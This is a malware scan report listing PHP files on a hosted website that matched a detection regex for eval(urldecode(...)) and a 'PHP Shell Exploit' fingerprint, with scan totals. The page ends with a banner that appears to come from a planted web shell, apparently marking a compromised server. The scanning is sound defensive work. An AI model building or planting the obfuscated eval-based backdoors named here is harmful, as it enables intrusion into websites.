'/home/eirtvhdf/wixted.eirtechs.com/menu1.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/wixted.eirtechs.com/mysql.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/wixted.eirtechs.com/nony.php'
# Universal decode regex match = [universal decoder]
# (decoded file [advanced decoder: 14 (depth: 1)]) Known exploit = [Fingerprint Match (fp)] [PHP Shell Exploit [P1425]]

'/home/eirtvhdf/wixted.eirtechs.com/str.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/wixted.eirtechs.com/under.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

----------- SCAN SUMMARY -----------
Scanned directories: 17977
Scanned files: 156145
Ignored items: 1100
Suspicious matches: 178
Viruses found: 3
Fingerprint matches: 44
Data scanned: 16379.87 MB
Scan peak memory: 414872 kB
Scan time/item: 0.074 sec
Scan time: 12955.783 sec

</pre><center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>